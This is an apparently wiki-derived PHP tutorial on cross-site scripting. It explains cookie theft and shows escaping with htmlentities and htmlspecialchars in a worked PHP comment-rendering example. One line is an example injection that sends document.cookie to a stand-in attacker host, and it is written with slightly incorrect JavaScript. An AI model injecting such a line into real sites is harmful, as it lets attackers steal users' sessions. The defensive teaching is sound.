Cross Site Scripting

Problem

Cross site scripting (or XSS) is, in basic terms, an attack in which a script injected into a web page sends sensitive information (such as cookies or other session identifiers) to another website.

Usually, these attacks affect websites whose content can be edited or added to by users. In most cases, session identifiers or even usernames/passwords are stored inside cookies. If somebody learns your session identifier, they can easily use it from their own machine to perform any malicious tasks in your name that you would not be happy about.

Right now, if you are logged in to Study Guides or any other website, go to that page and type this into the address bar:

javascript:void(alert(document.cookie))

Those are the cookies your browser sends to the website with every request to identify you. Just as easily, if your site is not XSS-proof, a cracker can inject something like this:

javascript:void(document.location('http://killer.website.com/steal_cookie.php?cookie_data='+document.cookie))

which sends the cookie data to their website.

Prevention

There is no way to protect yourself from XSS attacks without neutralising any malicious HTML/JavaScript in submitted content before it is shown to other visitors of your website.

By far the most common way is to use htmlentities or htmlspecialchars to escape user-supplied text so that nobody can add HTML to your site (e.g. in blog comments). Pass ENT_QUOTES and the page charset explicitly, so that single quotes are escaped as well and the function cannot misinterpret the encoding:

$message = htmlentities($message, ENT_QUOTES, 'UTF-8');

Another way is to offer some kind of restricted "protected mode" markup, such as MediaWiki syntax, BBCode or others that were invented to let users style/format their content easily without writing raw HTML. Bear in mind that the code which renders such markup into HTML must itself escape everything it passes through, otherwise it merely moves the problem.
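As an added example (not code from the original article), the following PHP shows the escaping described above applied to a blog comment, with the user's name placed in an attribute and the message in the element body; all names and sample inputs are constructed for the illustration.

```php
<?php
// Added example: escape untrusted text before writing it into a page.
declare(strict_types=1);

// Escape text for use between HTML tags or inside a quoted attribute.
function escape_html_text(string $untrusted): string
{
    // ENT_QUOTES converts both " and ' so the result is safe inside
    // single- and double-quoted attributes; ENT_SUBSTITUTE replaces
    // invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the HTML for one comment; every user-controlled value is escaped.
function render_comment(string $author, string $message): string
{
    return '<div class="comment" data-author="' . escape_html_text($author) . '">'
         . '<p>' . escape_html_text($message) . '</p></div>';
}

// Constructed sample input: a name containing quotes and a message that
// contains a script tag, as a hostile commenter might submit.
$author  = 'Ann "the admin" O\'Brien';
$message = '<script>alert(document.cookie)</script> nice post';

// Vulnerable version for comparison: raw interpolation, no escaping.
$unsafe = '<p>' . $message . '</p>';
$safe   = render_comment($author, $message);

echo "Unescaped: $unsafe\n";
echo "Escaped:   $safe\n";

// The escaped output carries no raw '<', '"' or "'" from user input,
// so the browser displays the text literally instead of executing it.
assert(strpos(escape_html_text($message), '<script') === false);
assert(strpos(escape_html_text($author), '"') === false);
assert(strpos(escape_html_text($author), "'") === false);
```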


  This article uses material from the Wikipedia page available here. It is released under the Creative Commons Attribution-Share-Alike License 3.0.

PHP_Programming/Cross_Site_Scripting